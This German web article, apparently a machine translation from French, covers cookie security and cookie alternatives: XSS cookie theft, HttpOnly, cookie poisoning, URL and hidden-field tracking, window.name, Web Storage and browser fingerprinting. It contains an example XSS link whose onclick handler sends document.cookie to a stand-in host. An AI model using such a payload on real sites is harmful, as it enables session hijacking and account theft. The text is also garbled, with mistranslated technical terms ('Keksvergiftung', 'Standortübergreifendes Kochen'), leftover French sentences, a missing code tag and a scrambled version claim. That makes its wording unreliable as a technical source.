Diese Art von In-Site-Scripting wird normalerweise von Angreifern auf Websites eingesetzt, die es Benutzern ermöglichen, HTML-Inhalte zu veröffentlichen. Durch die Integration eines Teils kompatiblen Codes in den HTML-Beitrag kann ein Angreifer Cookies von anderen Benutzern erhalten. Die Kenntnis dieser Cookies kann verwendet werden, indem man sich mit den gestohlenen Cookies mit derselben Website verbindet und so als der Benutzer erkannt wird, dessen Cookies gestohlen wurden.

Eine Möglichkeit, solche Angriffe zu verhindern, besteht darin, das HttpOnly-Flag zu verwenden. Es ist eine Option, die seit Version 6 des Internet Explorers in PHP seit Version 5.2.0 eingeführt wurde und das Cookie für den Client in der Nähe des Skripts unzugänglich machen soll. Webentwickler sollten dies jedoch bei ihrer Site-Entwicklung berücksichtigen, damit sie gegen Scripting auf der Site immun sind.

Eine weitere Sicherheitsbedrohung, die verwendet wird, ist die Bedarfserzeugung am Standort.

Die offizielle technische Spezifikation lässt zu, dass Cookies nur an Server in der Domäne zurückgesendet werden, von der sie stammen. Der Wert von Cookies kann jedoch mit anderen Mitteln als Cookie-Headern an andere Server gesendet werden.

Insbesondere Skriptsprachen wie JavaScript dürfen grundsätzlich auf Cookie-Werte zugreifen und sind in der Lage, beliebige Werte an beliebige Server im Internet zu senden. Diese Skriptfunktion wird von Websites verwendet, die es Benutzern ermöglichen, HTML-Inhalte zu posten, damit andere Benutzer sie anzeigen können.

Beispielsweise könnte ein Angreifer, der auf der Domain example.com operiert, einen Kommentar posten, der den folgenden Link enthält, der auf ein beliebtes Blog verweist, das er ansonsten nicht kontrolliert:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Wenn ein anderer Benutzer auf diesen Link klickt, führt der Browser den onclick-Attributteil des Codes aus, sodass er die document.cookie-Zeichenfolge durch die Liste der Benutzer-Cookies ersetzt, die für diese Seite aktiv sind. Daher wird diese Liste von Cookies an den Server von example.com gesendet, und der Angreifer ist daher in der Lage, die Cookies dieses Benutzers zu sammeln.

Diese Art von Angriff ist auf Benutzerseite schwer zu erkennen, da das Skript von derselben Domäne stammt, die das Cookie gesetzt hat, und die Operation zum Senden der Werte von dieser Domäne autorisiert zu sein scheint. Es wird davon ausgegangen, dass es in der Verantwortung der Administratoren liegt, die diese Art von Website betreiben, Beschränkungen einzurichten, die die Veröffentlichung von bösartigem Code verhindern.

Cookies sind für clientseitige Programme wie JavaScript nicht direkt sichtbar, wenn sie mit dem HttpOnly-Flag gesendet wurden. Aus Sicht des Servers besteht der einzige Unterschied darin, dass in der Zeile des Set-Cookie-Headers ein neues Feld hinzugefügt wird, das den String HttpOnly enthält:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Wenn der Browser ein solches Cookie erhält, soll er es normalerweise im folgenden HTTP-Austausch verwenden, ohne es jedoch für clientseitig ausgeführte Skripte sichtbar zu machen. Das HttpOnly-Flag ist nicht Teil einer offiziellen technischen Spezifikation und nicht in allen Browsern implementiert. Beachten Sie, dass es derzeit keine Möglichkeit gibt, das Lesen und Schreiben von Sitzungscookies durch die XMLHTTPRequest-Methode zu verhindern.

Änderung des Inhalts: Ein Angreifer sendet ein ungültiges Cookie an einen Server, das möglicherweise aus einem vom Server gesendeten gültigen Cookie besteht.

Sobald die Cookies gespeichert und unverändert an den Server zurückgegeben werden müssen, kann ein Angreifer den Wert der Cookies ändern, bevor sie an den Server zurückgesendet werden. Wenn ein Cookie beispielsweise den Gesamtwert enthält, den der Benutzer für die Artikel im Warenkorb des Geschäfts bezahlen muss, setzt eine Änderung dieses Werts den Server dem Risiko aus, dem Angreifer weniger als den Startpreis in Rechnung zu stellen. Der Prozess zum Ändern des Werts von Cookies wird aufgerufen Keksvergiftung und kann nach Cookie-Diebstahl verwendet werden, um den Angriff dauerhaft zu machen.

Bei der Cookie-Override-Methode nutzt der Angreifer einen Browserfehler aus, um ein ungültiges Cookie an den Server zu senden.

Die meisten Websites speichern jedoch nur eine Sitzungs-ID – eine zufällig generierte eindeutige Nummer, die zur Identifizierung des Sitzungsbenutzers verwendet wird – im Cookie selbst, während alle anderen Informationen auf dem Server gespeichert werden. In diesem Fall ist dieses Problem weitgehend gelöst.

Es wird erwartet, dass jede Site ihre eigenen Cookies hat, daher sollte eine Site nicht in der Lage sein, Cookies zu ändern oder zu erstellen, die mit einer anderen Site verknüpft sind. Eine Sicherheitslücke im Webbrowser kann es böswilligen Websites ermöglichen, diese Regel zu brechen. Die Ausnutzung eines solchen Fehlers wird allgemein als bezeichnet Standortübergreifendes Kochen. Der Zweck solcher Angriffe kann Session-ID-Diebstahl sein.

Benutzer sollten die neuesten Versionen von Webbrowsern verwenden, in denen diese Schwachstellen praktisch beseitigt sind.

Konfliktzustand zwischen Client und Server

Die Verwendung von Cookies kann einen Widerspruch zwischen dem Zustand des Clients und dem im Cookie gespeicherten Zustand erzeugen. Wenn der Benutzer ein Cookie erwirbt und auf die „Zurück“-Schaltfläche des Browsers klickt, ist der Zustand des Browsers im Allgemeinen nicht derselbe wie vor dieser Erfassung. Wenn beispielsweise der Warenkorb eines Online-Shops mithilfe von Cookies erstellt wird, kann sich der Inhalt des Warenkorbs nicht ändern, wenn der Benutzer zum Browserverlauf zurückkehrt: Wenn der Benutzer eine Schaltfläche drückt, um einen Artikel in seinen Warenkorb zu legen, und auf die Schaltfläche „Zurück "Button, der Artikel bleibt in diesem. Dies ist möglicherweise nicht die Absicht des Benutzers, der das Hinzufügen des Artikels auf jeden Fall abbrechen möchte. Dies kann zu Unzuverlässigkeit, Verwirrung und Fehlern führen. Webentwickler sollten sich dieses Problems also bewusst sein und Maßnahmen ergreifen, um mit solchen Situationen umzugehen.

Persistente Cookies wurden von Datenschutzexperten dafür kritisiert, dass sie nicht früh genug ablaufen, wodurch Websites Benutzer verfolgen und ihr Profil im Laufe der Zeit erstellen können. Dieser Aspekt von Cookies ist auch Teil des Session-Hijacking-Problems, da ein gestohlenes dauerhaftes Cookie verwendet werden kann, um sich für einen beträchtlichen Zeitraum als Benutzer auszugeben.

Lesen Sie auch: GAFAM: Wer sind sie? Warum sind sie (manchmal) so gruselig?

Alternativen zu Cookies

Einige Vorgänge, die mit Cookies durchgeführt werden können, können auch mit anderen Mechanismen durchgeführt werden, die Cookies umgehen oder gelöschte Cookies neu erstellen, was zu Datenschutzproblemen auf die gleiche Weise (oder manchmal schlimmer, weil dann unsichtbar) führt wie Cookies.

IP-Adresse

Nutzer können über die IP-Adresse des aufrufenden Rechners verfolgt werden. Diese Technik ist seit der Einführung des World Wide Web verfügbar, da der Server beim Herunterladen von Seiten die IP-Adresse des Computers anfordert, auf dem der Browser oder Proxy läuft, falls keiner verwendet wird. Der Server kann diese Informationen verfolgen, unabhängig davon, ob Cookies verwendet werden oder nicht. Diese Adressen sind jedoch in der Regel weniger zuverlässig bei der Identifizierung eines Benutzers als Cookies, da Computer und Proxys von mehreren Benutzern gemeinsam genutzt werden können und derselbe Computer bei jeder Arbeitssitzung eine andere IP-Adresse erhalten kann (wie dies häufig bei Telefonverbindungen der Fall ist). .

Die Nachverfolgung anhand von IP-Adressen kann in einigen Situationen zuverlässig sein, z. B. bei Breitbandverbindungen, bei denen die gleiche IP-Adresse für lange Zeit beibehalten wird, solange der Strom eingeschaltet ist.

Einige Systeme wie Tor sind darauf ausgelegt, die Anonymität des Internets zu wahren und die Nachverfolgung anhand der IP-Adresse unmöglich oder unpraktisch zu machen.

URL

Eine präzisere Technik basiert auf dem Einbetten von Informationen in URLs. Der Teil der Abfragezeichenfolge der URL ist eine Technik, die normalerweise für diesen Zweck verwendet wird, aber andere Teile können ebenfalls verwendet werden. Sowohl das Java-Serverlet als auch die PHP-Sitzungsmechanismen verwenden diese Methode, wenn Cookies nicht aktiviert sind.

Bei dieser Methode hängt der Webserver Zeichenfolgenanforderungen an die Links der Webseite an, die ihn enthält, wenn er an den Browser gesendet wird. Wenn der Benutzer einem Link folgt, gibt der Browser die angehängte Abfragezeichenfolge an den Server zurück.

Zu diesem Zweck verwendete Abfragezeichenfolgen und Cookies sind sehr ähnlich, da es sich bei beiden um willkürlich vom Server ausgewählte und vom Browser zurückgegebene Informationen handelt. Es gibt jedoch einige Unterschiede: Wenn eine URL, die eine Abfragezeichenfolge enthält, wiederverwendet wird, werden dieselben Informationen an den Server gesendet. Wenn beispielsweise die Einstellungen eines Benutzers in einer Abfragezeichenfolge einer URL codiert sind und der Benutzer diese URL per E-Mail an einen anderen Benutzer sendet, kann dieser Benutzer diese Einstellungen ebenfalls verwenden.

Wenn ein Benutzer andererseits zweimal auf dieselbe Seite zugreift, gibt es keine Garantie dafür, dass beide Male dieselbe Abfragezeichenfolge verwendet wird. Wenn ein Benutzer zum Beispiel das erste Mal von einer internen Site-Seite auf einer Seite landet und das zweite Mal von einer externen Seite auf derselben Seite landet, ist die Abfragezeichenfolge relativ zur Site-Seite normalerweise anders, während die Cookies dieselben sind .

Andere Nachteile von Abfragezeichenfolgen beziehen sich auf die Sicherheit: Das Aufbewahren von Daten, die eine Sitzung identifizieren, in Abfragezeichenfolgen ermöglicht oder vereinfacht Sitzungsfixierungsangriffe, Kennungsreferenzangriffe und andere Exploits. Das Übergeben von Sitzungs-IDs als HTTP-Cookies ist sicherer.

Verstecktes Formularfeld

Eine Form der Sitzungsverfolgung, die von ASP.NET verwendet wird, besteht darin, Webformulare mit ausgeblendeten Feldern zu verwenden. Diese Technik ist der Verwendung von URL-Abfragezeichenfolgen zum Übertragen von Informationen sehr ähnlich und hat die gleichen Vor- und Nachteile; und wenn das Formular mit der HTTP-GET-Methode verarbeitet wird, werden die Felder tatsächlich Teil der URL des Browsers, der sie beim Absenden des Formulars sendet. Die meisten Formulare werden jedoch mit HTTP POST verarbeitet, was dazu führt, dass die Formularinformationen, einschließlich versteckter Felder, als zusätzliche Eingabe hinzugefügt werden, die weder Teil der URL noch ein Cookie ist.

Dieser Ansatz hat aus Tracking-Sicht zwei Vorteile: Erstens ermöglicht das Tracking der im HTML-Quellcode und der POST-Eingabe platzierten Informationen anstelle der URL dem durchschnittlichen Benutzer, dieses Tracking zu vermeiden; Zweitens werden die Sitzungsinformationen nicht kopiert, wenn der Benutzer die URL kopiert (z. B. um die Seite auf der Festplatte zu speichern oder per E-Mail zu versenden).

fenster.name

Alle gängigen Webbrowser können eine recht große Datenmenge (2 MB bis 32 MB) über JavaScript mit der Eigenschaft window.name des DOM speichern. Diese Daten können anstelle von Session-Cookies verwendet werden und werden auch domänenübergreifend verwendet. Die Technik kann mit JSON-Objekten gekoppelt werden, um einen komplexen Satz clientseitiger Sitzungsvariablen zu speichern.

Der Nachteil ist, dass jedes einzelne Fenster oder jeder Tab anfangs einen leeren window.name hat; Beim Durchsuchen nach (vom Benutzer geöffneten) Registerkarten bedeutet dies, dass die einzeln geöffneten Registerkarten keinen Fensternamen haben. Darüber hinaus kann window.name verwendet werden, um Besucher über verschiedene Websites hinweg zu verfolgen, was ein Datenschutzproblem darstellen kann.

Dies kann in mancher Hinsicht sicherer sein als Cookies, da der Server nicht involviert ist und ihn somit für Netzwerkangriffe von Sniffer-Cookies unverwundbar macht. Wenn jedoch besondere Maßnahmen zum Schutz der Daten ergriffen werden, sind sie anfällig für weitere Angriffe, da die Daten über andere Websites verfügbar sind, die im selben Fenster geöffnet werden.

HTTP-Authentifizierung

Das HTTP-Protokoll umfasst die grundlegenden Zugriffsauthentifizierungsprotokolle und den Zugriffsauthentifizierungsdigest, der den Zugriff auf eine Webseite nur erlaubt, wenn der Benutzer den Benutzernamen und das Passwort angegeben hat. Wenn der Server ein Zertifikat anfordert, um den Zugriff auf eine Webseite zu gewähren, fordert der Browser es vom Benutzer an und sobald es erhalten wurde, speichert der Browser es und sendet es in allen nachfolgenden HTTP-Anforderungen. Diese Informationen können verwendet werden, um den Benutzer zu verfolgen.

Lokales gemeinsames Objekt

Wenn ein Browser das Adobe Flash Player-Plug-in enthält, wird die lokale gemeinsam genutzte Objekte können für den gleichen Zweck wie Cookies verwendet werden. Sie können eine attraktive Wahl für Webentwickler sein, weil:

  • die standardmäßige Größenbeschränkung für ein lokales gemeinsam genutztes Objekt beträgt 100 KB;
  • Sicherheitsüberprüfungen sind von Benutzer-Cookie-Überprüfungen getrennt (so dass lokale freigegebene Objekte zugelassen werden können, wenn Cookies nicht zulässig sind).

Dieser letzte Punkt, der die Cookie-Verwaltungsrichtlinie von der der lokalen gemeinsam genutzten Objekte von Adobe unterscheidet wirft Fragen auf bezüglich der Verwaltung seiner Datenschutzeinstellungen durch den Benutzer: Er muss sich darüber im Klaren sein, dass seine Verwaltung von Cookies keinen Einfluss auf die Verwaltung lokaler gemeinsam genutzter Objekte hat und umgekehrt.

Ein weiterer Kritikpunkt an diesem System ist, dass es nur über das Adobe Flash Player-Plugin verwendet werden kann, das proprietär und kein Webstandard ist.

Clientseitige Persistenz

Einige Webbrowser unterstützen einen skriptbasierten Persistenzmechanismus, der es der Seite ermöglicht, Informationen lokal für die spätere Verwendung zu speichern. Internet Explorer unterstützt beispielsweise dauerhafte Informationen im Browserverlauf, in Lesezeichen, in einem in XML gespeicherten Format oder direkt mit einer auf der Festplatte gespeicherten Webseite. Für Microsoft Internet Explorer 5 gibt es eine Benutzerdatenmethode, die über DHTML-Verhalten verfügbar ist.

Das W3C führte in HTML 5 eine neue JavaScript-API für die clientseitige Datenspeicherung namens Web Storage ein und zielte darauf ab, Cookies dauerhaft zu ersetzen. Es ähnelt Cookies, jedoch mit stark verbesserter Kapazität und ohne das Speichern von Informationen im Header von HTTP-Anforderungen. Die API ermöglicht zwei Arten von Webspeicherung: lokale Speicherung und Sitzungsspeicherung, ähnlich wie dauerhafte Cookies und Sitzungscookies (mit der Ausnahme, dass Sitzungscookies ablaufen, wenn der Browser geschlossen wird, während Sitzungsspeicher verfallen, wenn die Registerkarte geschlossen wird). Webspeicher wird von Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 und Opera 10.50 unterstützt.

Ein anderer Mechanismus beruht normalerweise auf Browser-Caching (im Arbeitsspeicher statt Aktualisierung) unter Verwendung von JavaScript-Programmen in Webseiten. 

Beispielsweise kann eine Seite das Tag enthalten . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

An dieser Stelle verbleibt das Programm im Cache-Speicher und die besuchte Seite wird nicht ein zweites Mal neu geladen. Wenn das Programm eine globale Variable enthält (z. B. var id = 3243242;), bleibt diese Kennung folglich gültig und kann von anderem JavaScript-Code ausgenutzt werden, sobald die Seite erneut geladen wird oder sobald eine Seite geladen wird, die das Programm verlinkt. 

Der Hauptnachteil dieser Methode besteht darin, dass die globale JavaScript-Variable statisch sein muss, dh sie kann nicht wie ein Cookie geändert oder gelöscht werden.

Webbrowser-Fingerabdruck

Ein Browser-Fingerabdruck sind Informationen, die zu Identifikationszwecken über die Konfigurationseinstellungen eines Browsers gesammelt werden. Diese Fingerabdrücke können verwendet werden, um einen Internetbenutzer oder ein Gerät vollständig oder teilweise zu identifizieren, selbst wenn Cookies deaktiviert sind.

Grundlegende Informationen zur Konfiguration von Webbrowsern werden seit langem von Website-Publikumsdiensten gesammelt, um den menschlichen Webverkehr genau zu messen und verschiedene Formen von Klickbetrug zu erkennen. Mit Hilfe clientseitiger Skriptsprachen ist das Sammeln von Informationen viel genauer jetzt möglich.

Die Umwandlung dieser Informationen in eine Bitfolge erzeugt einen Gerätefingerabdruck. Im Jahr 2010 hat die Electronic Frontier Foundation (EFF) die Entropie des Fingerabdrucks eines Browsers mit mindestens gemessen 18,1 Bits, und das war, bevor Fortschritte beim Canvas-Fingerabdruck dieser Entropie 5,7 Bit hinzufügten.

Kekse in Kürze

Cookies sind kleine Textdateien, die vom Webbrowser auf der Festplatte eines Website-Besuchers gespeichert werden und die (unter anderem) verwendet werden, um Informationen über den Besucher oder seine Reise durch die Website aufzuzeichnen. Der Webmaster kann so die Gewohnheiten eines Besuchers erkennen und die Darstellung seiner Seite für jeden Besucher personalisieren; Cookies ermöglichen es dann, sich zu merken, wie viele Artikel auf der Startseite angezeigt werden sollen, oder sogar die Anmeldedaten für private Parteien aufzubewahren: Wenn der Besucher auf die Website zurückkehrt, muss er nicht mehr seinen Namen und sein Passwort eingeben wiedererkannt werden, da sie automatisch im Cookie ausgelesen werden.

Ein Cookie hat eine begrenzte Lebensdauer, die vom Website-Designer festgelegt wird. Sie können auch am Ende der Sitzung auf der Website ablaufen, was dem Schließen des Browsers entspricht. Cookies werden häufig verwendet, um Besuchern das Leben zu erleichtern und ihnen relevantere Informationen zu präsentieren. Aber spezielle Techniken machen es möglich, einem Besucher auf mehreren Seiten zu folgen und so sehr umfangreiche Informationen über seine Gewohnheiten zu sammeln und abzugleichen. Diese Methode hat der Verwendung von Cookies einen Ruf als Überwachungstechnik eingebracht, die die Privatsphäre der Besucher verletzt, was leider in vielen Fällen der Realität entspricht, wenn sie aus nicht technischen Gründen verwendet werden oder die Erwartungen der Benutzer nicht respektieren. .

Als Reaktion auf diese berechtigten Befürchtungen führt HTML 5 eine neue JavaScript-API für die clientseitige Datenspeicherung namens Web Storage ein, die viel sicherer und mit größerer Kapazität ist und darauf abzielt, Cookies zu ersetzen.

Speicherung von Cookies

Bei einigen Browsern ist ein Cookie leicht editierbar, ein einfacher Texteditor wie Notepad reicht aus, um seine Werte manuell zu ändern.

Je nach Browser werden Cookies unterschiedlich gespeichert:

  • Microsoft Internet Explorer speichert jedes Cookie in einer anderen Datei;
  • Mozilla Firefox speichert alle seine Cookies in einer einzigen Datei;
  • Opera speichert alle seine Cookies in einer einzigen Datei und verschlüsselt sie (außer in den Softwareoptionen können sie nicht geändert werden);
  • Apple Safari speichert alle seine Cookies in einer einzigen .plist-Erweiterungsdatei. Eine Änderung ist möglich, aber nicht sehr einfach, es sei denn, Sie gehen die Softwareoptionen durch.

Zur Unterstützung sind Browser erforderlich die minimale :

  • 300 gleichzeitige Cookies;
  • 4 o pro Cookie;
  • 20 Cookies pro Host oder Domain.
[Gesamt: 0 Durchschnitt: 0]

Geschrieben von Rezensionsredakteure

Das Team von erfahrenen Redakteuren verbringt seine Zeit damit, Produkte zu recherchieren, praktische Tests durchzuführen, Branchenexperten zu interviewen, Kundenbewertungen zu überprüfen und alle unsere Ergebnisse als verständliche und umfassende Zusammenfassungen zu verfassen.

Hinterlassen Sie einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Was denken Sie?

384 Punkte
upvote Downvote